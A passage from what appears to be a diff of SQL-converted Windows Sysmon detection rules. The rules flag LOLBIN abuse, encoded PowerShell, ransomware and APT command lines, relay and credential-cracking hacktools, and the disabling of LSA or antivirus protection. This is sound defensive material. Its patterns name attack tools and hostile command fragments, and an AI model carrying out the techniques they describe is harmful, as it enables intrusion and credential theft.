'\\' OR Description = 'AnyDesk' OR Product = 'AnyDesk' OR Company = 'AnyDesk Software GmbH'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dotnet-dump.exe' ESCAPE '\\' OR OriginalFileName = 'dotnet-dump.dll') AND CommandLine LIKE '%collect%' ESCAPE '\\')" ], - "filename": "proc_creation_win_remote_access_tools_anydesk.yml" + "filename": "proc_creation_win_lolbin_dotnet_dump.yml" }, { - "title": "Execution in Outlook Temp Folder", - "id": "a018fdc3-46a3-44e5-9afb-2cd4af1d4b39", - "status": "test", - "description": "Detects a suspicious program execution in Outlook temp folder", - "author": "Florian Roth (Nextron Systems)", + "title": "Use of Mftrace.exe", + "id": "3d48c9d3-1aa6-418d-98d3-8fd3c01a564e", + "status": "experimental", + "description": "The \"Trace log generation tool for Media Foundation Tools\" (Mftrace.exe) can be used to execute arbitrary binaries", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ - "Unknown" + "Legitimate use for tracing purposes" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR OriginalFileName = 'mftrace.exe') AND (CommandLine LIKE '%.exe %' ESCAPE '\\' AND CommandLine LIKE '%.exe' ESCAPE '\\')) OR ParentImage LIKE '%\\\\mftrace.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_office_outlook_execution_from_temp.yml" + "filename": "proc_creation_win_lolbin_mftrace.yml" }, { - "title": "Turla Group Commands May 2020", - "id": "9e2e51c5-c699-4794-ba5a-29f5da40ac0c", - "status": "test", - "description": "Detects commands used by Turla group as reported by ESET in May 2020", - "author": "Florian Roth (Nextron Systems)", + "title": "LockerGoga Ransomware Activity", + "id": "74db3488-fd28-480a-95aa-b7af626de068", + "status": "stable", + "description": "Detects LockerGoga ransomware activity via specific command line.", + "author": "Vasiliy Burov, oscd.community", "tags": [ - "attack.g0010", - "attack.execution", - "attack.t1059.001", - "attack.t1053.005", - "attack.t1027" + "attack.impact", + "attack.t1486" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%tracert -h 10 yahoo.com%' ESCAPE '\\' OR CommandLine LIKE '%.WSqmCons))|iex;%' ESCAPE '\\' OR CommandLine LIKE '%Fr`omBa`se6`4Str`ing%' ESCAPE '\\') OR (CommandLine LIKE '%net use https://docs.live.net%' ESCAPE '\\' AND CommandLine LIKE '%@aol.co.uk%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-i SM-tgytutrc -s%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_turla_comrat_may20.yml" + "filename": "proc_creation_win_malware_lockergoga_ransomware.yml" }, { - "title": "Format.com FileSystem LOLBIN", - "id": "9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60", - "status": "test", - "description": "Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.defense_evasion" - ], + "title": "Kavremover Dropped Binary LOLBIN Usage", + "id": "d047726b-c71c-4048-a99b-2e2f50dc107d", + "status": "experimental", + "description": "Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ], "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\format.com' ESCAPE '\\' AND CommandLine LIKE '%/fs:%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%/fs:FAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:exFAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:NTFS%' ESCAPE '\\' OR CommandLine LIKE '%/fs:UDF%' ESCAPE '\\' OR CommandLine LIKE '%/fs:ReFS%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '% run run-cmd %' ESCAPE '\\' AND NOT ((ParentImage LIKE '%\\\\kavremover.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cleanapi.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_format.yml" + "filename": "proc_creation_win_lolbin_kavremover.yml" }, { - "title": "Suspicious PowerShell Encoded Command Patterns", - "id": "b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c", + "title": "Add New Windows Capability - ProcCreation", + "id": "b36d01a3-ddaf-4804-be18-18a6247adfcd", "status": "experimental", - "description": "Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of the \"Add-WindowsCapability\" cmdlet to add new windows capabilities. Notable capabilities could be \"OpenSSH\" and others.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.execution" ], "falsepositives": [ - "Other tools that work with encoded scripts in the command line instead of script files" + "Legitimate usage of the capabilities by administartors or users. Filter accordingly" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -enco%' ESCAPE '\\') AND (CommandLine LIKE '% JAB%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% PAA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\')) AND NOT (((ParentImage LIKE '%C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\gc\\_worker.exe%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Add-WindowsCapability%' ESCAPE '\\' AND CommandLine LIKE '%OpenSSH.%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_encoded_cmd_patterns.yml" + "filename": "proc_creation_win_powershell_add_windows_capability.yml" }, { - "title": "Rundll32 Execution Without Parameters", - "id": "5bb68627-3198-40ca-b458-49f973db8752", - "status": "test", - "description": "Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module", - "author": "Bartlomiej Czyz, Relativity", + "title": "Use of FSharp Interpreters", + "id": "b96b2031-7c17-4473-afe7-a30ce714db29", + "status": "experimental", + "description": "The FSharp Interpreters, FsiAnyCpu.exe and FSi.exe, can be used for AWL bypass and is listed in Microsoft recommended block rules.", + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1570", "attack.execution", - "attack.t1569.002" + "attack.t1059" ], "falsepositives": [ - "False positives may occur if a user called rundll32 from CLI with no options" + "Legitimate use by a software developer." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine IN ('rundll32.exe', 'rundll32'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fsianycpu.exe' ESCAPE '\\' OR OriginalFileName = 'fsianycpu.exe' OR Image LIKE '%\\\\fsi.exe' ESCAPE '\\' OR OriginalFileName = 'fsi.exe'))" ], - "filename": "proc_creation_win_rundll32_without_parameters.yml" + "filename": "proc_creation_win_lolbin_fsharp_interpreters.yml" }, { - "title": "Phishing Pattern ISO in Archive", - "id": "fcdf69e5-a3d3-452a-9724-26f2308bf2b1", + "title": "Taskkill Symantec Endpoint Protection", + "id": "4a6713f6-3331-11ed-a261-0242ac120002", "status": "experimental", - "description": "Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects one of the possible scenarios for disabling Symantec Endpoint Protection.\nSymantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.\nAs a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.\n", + "author": "Ilya Krestinichev, Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1566" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\Winrar.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\7zFM.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\peazip.exe' ESCAPE '\\') AND (Image LIKE '%\\\\isoburn.exe' ESCAPE '\\' OR Image LIKE '%\\\\PowerISO.exe' ESCAPE '\\' OR Image LIKE '%\\\\ImgBurn.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%taskkill%' ESCAPE '\\' AND CommandLine LIKE '% /F %' ESCAPE '\\' AND CommandLine LIKE '% /IM %' ESCAPE '\\' AND CommandLine LIKE '%ccSvcHst.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_archiver_iso_phishing.yml" + "filename": "proc_creation_win_taskkill_sep.yml" }, { - "title": "Service StartupType Change Via PowerShell Set-Service", - "id": "62b20d44-1546-4e61-afce-8e175eb9473c", + "title": "Using AppVLP To Circumvent ASR File Path Rule", + "id": "9c7e131a-0f2c-4ae0-9d43-b04f4e266d43", "status": "experimental", - "description": "Detects the use of the PowerShell \"Set-Service\" cmdlet to change the startup type of a service to \"disabled\" or \"manual\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Application Virtualization Utility is included with Microsoft Office. We are able to abuse \"AppVLP\" to execute shell commands.\nNormally, this binary is used for Application Virtualization, but we can use it as an abuse binary to circumvent the ASR file path rule folder\nor to mark a file as a system file.\n", + "author": "Sreeman", "tags": [ - "attack.execution", + "attack.t1218", "attack.defense_evasion", - "attack.t1562.001" + "attack.execution" ], "falsepositives": [ - "False positives may occur with troubleshooting scripts" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR OriginalFileName = 'PowerShell.EXE') AND (CommandLine LIKE '%Set-Service%' ESCAPE '\\' AND CommandLine LIKE '%-StartupType%' ESCAPE '\\' AND (CommandLine LIKE '%Disabled%' ESCAPE '\\' OR CommandLine LIKE '%Manual%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\appvlp.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\msoasb.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_set_service_disabled.yml" + "filename": "proc_creation_win_lolbin_appvlp.yml" }, { - "title": "Serv-U Exploitation CVE-2021-35211 by DEV-0322", - "id": "75578840-9526-4b2a-9462-af469a45e767", - "status": "test", - "description": "Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Unquoted Service Path Reconnaissance Via Wmic.EXE", + "id": "68bcd73b-37ef-49cb-95fc-edc809730be6", + "status": "experimental", + "description": "Detects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1136.001", - "cve.2021.35211" + "attack.execution", + "attack.t1047" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%whoami%' ESCAPE '\\' AND ((CommandLine LIKE '%./Client/Common/%' ESCAPE '\\' OR CommandLine LIKE '%.\\\\Client\\\\Common\\\\%' ESCAPE '\\') OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\Serv-U.bat%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'wmic.exe' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '% service get %' ESCAPE '\\' AND CommandLine LIKE '%name,displayname,pathname,startmode%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_35211_servu.yml" + "filename": "proc_creation_win_wmic_recon_unquoted_service_search.yml" }, { - "title": "HackTool - Hashcat Password Cracker Execution", - "id": "39b31e81-5f5f-4898-9c0e-2160cfc0f9bf", + "title": "Potential SMB Relay Attack Tool Execution", + "id": "5589ab4f-a767-433c-961d-c91f3f704db1", "status": "test", - "description": "Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against", - "author": "frack113", + "description": "Detects different hacktools used for relay attacks on Windows for privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1110.002" + "attack.execution", + "attack.t1557.001" ], "falsepositives": [ - "Tools that use similar command line flags and values" + "Legitimate files with these rare hacktool names" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\hashcat.exe' ESCAPE '\\' OR (CommandLine LIKE '%-a %' ESCAPE '\\' AND CommandLine LIKE '%-m 1000 %' ESCAPE '\\' AND CommandLine LIKE '%-r %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%PetitPotam%' ESCAPE '\\' OR Image LIKE '%RottenPotato%' ESCAPE '\\' OR Image LIKE '%HotPotato%' ESCAPE '\\' OR Image LIKE '%JuicyPotato%' ESCAPE '\\' OR Image LIKE '%\\\\just\\_dce\\_%' ESCAPE '\\' OR Image LIKE '%Juicy Potato%' ESCAPE '\\' OR Image LIKE '%\\\\temp\\\\rot.exe%' ESCAPE '\\' OR Image LIKE '%\\\\Potato.exe%' ESCAPE '\\' OR Image LIKE '%\\\\SpoolSample.exe%' ESCAPE '\\' OR Image LIKE '%\\\\Responder.exe%' ESCAPE '\\' OR Image LIKE '%\\\\smbrelayx%' ESCAPE '\\' OR Image LIKE '%\\\\ntlmrelayx%' ESCAPE '\\' OR Image LIKE '%\\\\LocalPotato%' ESCAPE '\\') OR (CommandLine LIKE '%Invoke-Tater%' ESCAPE '\\' OR CommandLine LIKE '% smbrelay%' ESCAPE '\\' OR CommandLine LIKE '% ntlmrelay%' ESCAPE '\\' OR CommandLine LIKE '%cme smb %' ESCAPE '\\' OR CommandLine LIKE '% /ntlm:NTLMhash %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PetitPotam%' ESCAPE '\\' OR CommandLine LIKE '%.exe -t % -p %' ESCAPE '\\') OR (CommandLine LIKE '%.exe -c \"{%' ESCAPE '\\' AND CommandLine LIKE '%}\" -z' ESCAPE '\\')) AND NOT (((Image LIKE '%HotPotatoes6%' ESCAPE '\\' OR Image LIKE '%HotPotatoes7%' ESCAPE '\\' OR Image LIKE '%HotPotatoes %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_hktl_hashcat.yml" + "filename": "proc_creation_win_hktl_relay_attacks_tools.yml" }, { - "title": "Suspicious Userinit Child Process", - "id": "b655a06a-31c0-477a-95c2-3726b83d649d", - "status": "test", - "description": "Detects a suspicious child process of userinit", - "author": "Florian Roth (Nextron Systems), Samir Bousseaden (idea)", + "title": "HackTool - winPEAS Execution", + "id": "98b53e78-ebaf-46f8-be06-421aafd176d9", + "status": "experimental", + "description": "WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz", + "author": "Georg Lauenstein (sure[secure])", "tags": [ - "attack.defense_evasion", - "attack.t1055" + "attack.privilege_escalation", + "attack.t1082", + "attack.t1087", + "attack.t1046" ], "falsepositives": [ - "Administrative scripts" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\userinit.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%\\\\netlogon\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' OR OriginalFileName = 'explorer.exe')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'winPEAS.exe' OR (Image LIKE '%\\\\winPEASany.exe' ESCAPE '\\' OR Image LIKE '%\\\\winPEASany\\_ofs.exe' ESCAPE '\\' OR Image LIKE '%\\\\winPEASx64.exe' ESCAPE '\\' OR Image LIKE '%\\\\winPEASx64\\_ofs.exe' ESCAPE '\\' OR Image LIKE '%\\\\winPEASx86.exe' ESCAPE '\\' OR Image LIKE '%\\\\winPEASx86\\_ofs.exe' ESCAPE '\\') OR (CommandLine LIKE '% applicationsinfo%' ESCAPE '\\' OR CommandLine LIKE '% browserinfo%' ESCAPE '\\' OR CommandLine LIKE '% eventsinfo%' ESCAPE '\\' OR CommandLine LIKE '% fileanalysis%' ESCAPE '\\' OR CommandLine LIKE '% filesinfo%' ESCAPE '\\' OR CommandLine LIKE '% processinfo%' ESCAPE '\\' OR CommandLine LIKE '% servicesinfo%' ESCAPE '\\' OR CommandLine LIKE '% windowscreds%' ESCAPE '\\') OR CommandLine LIKE '%https://github.com/carlospolop/PEASS-ng/releases/latest/download/%' ESCAPE '\\' OR ParentCommandLine LIKE '% -linpeas' ESCAPE '\\' OR CommandLine LIKE '% -linpeas' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_userinit_child.yml" + "filename": "proc_creation_win_hktl_winpeas.yml" }, { - "title": "Suspicious Execution of Shutdown", - "id": "34ebb878-1b15-4895-b352-ca2eeb99b274", - "status": "test", - "description": "Use of the commandline to shutdown or reboot windows", - "author": "frack113", + "title": "Exploiting CVE-2019-1388", + "id": "02e0b2ea-a597-428e-b04a-af6a1a403e5c", + "status": "stable", + "description": "Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1529" + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\shutdown.exe' ESCAPE '\\' AND (CommandLine LIKE '%/r %' ESCAPE '\\' OR CommandLine LIKE '%/s %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\consent.exe' ESCAPE '\\' AND Image LIKE '%\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\') AND (IntegrityLevel = 'System' OR (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_shutdown_execution.yml" + "filename": "proc_creation_win_exploit_cve_2019_1388.yml" }, { - "title": "LSA PPL Protection Disabled Via Reg.EXE", - "id": "8c0eca51-0f88-4db2-9183-fdfb10c703f9", + "title": "HackTool - KrbRelay Execution", + "id": "e96253b8-6b3b-4f90-9e59-3b24b99cf9b4", "status": "experimental", - "description": "Detects the usage of the \"reg.exe\" utility to disable PPL protection on the LSA process", + "description": "Detects the use of KrbRelay, a Kerberos relaying tool", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.010" + "attack.credential_access", + "attack.t1558.003" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND CommandLine LIKE '% /v RunAsPPL %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\KrbRelay.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelay.exe') OR (CommandLine LIKE '% -spn %' ESCAPE '\\' AND CommandLine LIKE '% -clsid %' ESCAPE '\\' AND CommandLine LIKE '% -rbcd %' ESCAPE '\\') OR (CommandLine LIKE '%shadowcred%' ESCAPE '\\' AND CommandLine LIKE '%clsid%' ESCAPE '\\' AND CommandLine LIKE '%spn%' ESCAPE '\\') OR (CommandLine LIKE '%spn %' ESCAPE '\\' AND CommandLine LIKE '%session %' ESCAPE '\\' AND CommandLine LIKE '%clsid %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_reg_lsa_ppl_protection_disabled.yml" + "filename": "proc_creation_win_hktl_krbrelay.yml" }, { - "title": "Psexec Execution", - "id": "730fc21b-eaff-474b-ad23-90fd265d4988", - "status": "test", - "description": "Detects user accept agreement execution in psexec commandline", - "author": "omkar72", + "title": "Suspicious Binary In User Directory Spawned From Office Application", + "id": "aa3a6f94-890e-4e22-b634-ffdfd54792cc", + "status": "experimental", + "description": "Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)", + "author": "Jason Lynch", "tags": [ "attack.execution", - "attack.t1569", - "attack.t1021" + "attack.t1204.002", + "attack.g0046", + "car.2013-05-002" ], "falsepositives": [ - "Administrative scripts." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\psexec.exe' ESCAPE '\\' OR OriginalFileName = 'psexec.c'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\EQNEDT32.exe' ESCAPE '\\') AND Image LIKE 'C:\\\\users\\\\%' ESCAPE '\\' AND Image LIKE '%.exe' ESCAPE '\\') AND NOT (Image LIKE '%\\\\Teams.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_psexec_execution.yml" + "filename": "proc_creation_win_office_spawn_exe_from_users_directory.yml" }, { - "title": "Potential Discovery Activity Via Dnscmd.EXE", - "id": "b6457d63-d2a2-4e29-859d-4e7affc153d1", - "status": "experimental", - "description": "Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones used to host the DNS records for a particular domain.", - "author": "@gott_cyber", + "title": "Fireball Archer Install", + "id": "3d4aebe0-6d29-45b2-a8a4-3dfde586a26d", + "status": "test", + "description": "Detects Archer malware invocation via rundll32", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", "attack.execution", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Legitimate administration use" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\dnscmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%/enumrecords%' ESCAPE '\\' OR CommandLine LIKE '%/enumzones%' ESCAPE '\\' OR CommandLine LIKE '%/ZonePrint%' ESCAPE '\\' OR CommandLine LIKE '%/info%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%InstallArcherSvc%' ESCAPE '\\')" ], - "filename": "proc_creation_win_dnscmd_discovery.yml" + "filename": "proc_creation_win_malware_fireball.yml" }, { - "title": "Wab/Wabmig Unusual Parent Or Child Processes", - "id": "63d1ccc0-2a43-4f4b-9289-361b308991ff", + "title": "Use of OpenConsole", + "id": "814c95cc-8192-4378-a70a-f1aafd877af1", "status": "experimental", - "description": "Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", + "description": "Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Legitimate use by an administrator" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (Image LIKE '%\\\\wab.exe' ESCAPE '\\' OR Image LIKE '%\\\\wabmig.exe' ESCAPE '\\')) OR (ParentImage LIKE '%\\\\wab.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wabmig.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'OpenConsole.exe' OR Image LIKE '%\\\\OpenConsole.exe' ESCAPE '\\') AND NOT (Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.WindowsTerminal%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wab_unusual_parents.yml" + "filename": "proc_creation_win_lolbin_openconsole.yml" }, { - "title": "Gpresult Display Group Policy Information", - "id": "e56d3073-83ff-4021-90fe-c658e0709e72", - "status": "experimental", - "description": "Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information", - "author": "frack113", + "title": "Abused Debug Privilege by Arbitrary Parent Processes", + "id": "d522eca2-2973-4391-a3e0-ef0374321dae", + "status": "test", + "description": "Detection of unusual child processes by different system processes", + "author": "Semanur Guneysu @semanurtg, oscd.community", "tags": [ - "attack.discovery", - "attack.t1615" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\gpresult.exe' ESCAPE '\\' AND (CommandLine LIKE '%/z%' ESCAPE '\\' OR CommandLine LIKE '%/v%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentImage LIKE 